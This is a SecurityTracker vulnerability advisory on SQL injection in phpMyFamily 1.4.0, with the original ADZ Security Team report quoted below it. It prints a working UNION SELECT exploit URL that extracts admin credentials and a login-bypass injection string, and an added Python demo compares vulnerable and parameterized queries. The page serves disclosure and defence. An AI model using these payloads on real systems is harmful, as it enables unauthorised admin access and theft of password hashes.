SecurityTracker.com
Category:   Application (Generic)  >   phpmyfamily
Vendors:   phpmyfamily.net
phpmyfamily Input Validation Holes Let Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1013493
SecurityTracker URL:  http://securitytracker.com/id/1013493
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 21 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.4.0
Description:   An input validation vulnerability was reported in phpmyfamily. A remote user can inject SQL commands.

Several scripts do not properly validate user-supplied input. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.

The 'people.php', 'track.php', 'edit.php', 'document.php', 'census.php', and 'passthru.php' scripts are vulnerable. Other scripts may also be affected.

A demonstration exploit URL is provided:

http://[target]/[path]/people.php?person=00002'%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WHERE%20admin='Y'%20LIMIT%201,1/*

A remote user can supply the following login username to authenticate to the application with administrative privileges:

' OR 'a'='a' AND admin='Y'/*

The vendor has been notified.

ADZ Security Team reported this vulnerability.

Impact:   A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpmyfamily.net/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
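
Added example (not phpmyfamily code and not part of the original advisory): the login string from the Description, run against a string-concatenated query and against a parameterized one, plus a digits-only check for the 'person' parameter. The table and column names come from the advisory; the rows, the query shape, the function names and the use of Python with SQLite in place of the application's PHP and database are assumptions made for illustration.

```python
import sqlite3

# Constructed stand-in for the application's user table. The names
# family_users, username, password and admin appear in the advisory;
# the rows and the shape of the login query are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE family_users (username TEXT, password TEXT, admin TEXT)")
    db.executemany("INSERT INTO family_users VALUES (?, ?, ?)",
                   [("guest", "hash-guest", "N"), ("root", "hash-root", "Y")])
    return db

def login_concatenated(db, username, password_hash):
    # Vulnerable pattern: request data is spliced into the SQL text, so a quote
    # in the username ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT username, admin FROM family_users WHERE username = '"
           + username + "' AND password = '" + password_hash + "'")
    return db.execute(sql).fetchone()

def login_parameterized(db, username, password_hash):
    # Hardened pattern: placeholders keep the values out of the SQL grammar,
    # so the whole input is compared as a literal username.
    sql = "SELECT username, admin FROM family_users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password_hash)).fetchone()

def parse_person_id(raw):
    # The 'person' value in the advisory's URL is a zero-padded number, so
    # anything other than ASCII digits is rejected before a query is built.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 10):
        raise ValueError("person must be a numeric identifier")
    return int(raw)

if __name__ == "__main__":
    db = make_db()
    reported_login = "' OR 'a'='a' AND admin='Y'/*"  # login string quoted in the advisory
    print("concatenated :", login_concatenated(db, reported_login, ""))
    print("parameterized:", login_parameterized(db, reported_login, ""))
    print("person id    :", parse_person_id("00002"))
```

With the concatenated query the trailing /* comments out the password comparison and the remaining condition matches the administrator row; with placeholders the same input matches no row.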

Message History:   This archive entry has one or more follow-up message(s) listed below.
Mar 25 2005 (Vendor Issues Fix) phpmyfamily Input Validation Holes Let Remote Users Inject SQL Commands
A fix is available.



 Source Message Contents

Subject:  phpMyFamily 1.4.0 SQL vulnerabilities


ADZ Security Team
===================
Info

Program: phpMyFamily
Version: 1.4.0
Modules: people.php, track.php, edit.php, document.php, census.php,
passthru.php and other..
Bug type: SQL Injection
Vendor site: http://www.phpmyfamily.net/
Vendor Informed: Yes
===================
Bug Info

Basic SQL-Injection in  of this engine

Examples/PoC:

http://[host]/[path]/people.php?person=00002'
%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1/* - This selects first admin with login &
password hash :)

Login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)


===================
Contact

ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: kre0n@mail.ru, adz.kreon@gmail.com (for non-russian users)

 
 



Copyright 2019, SecurityGlobal.net LLC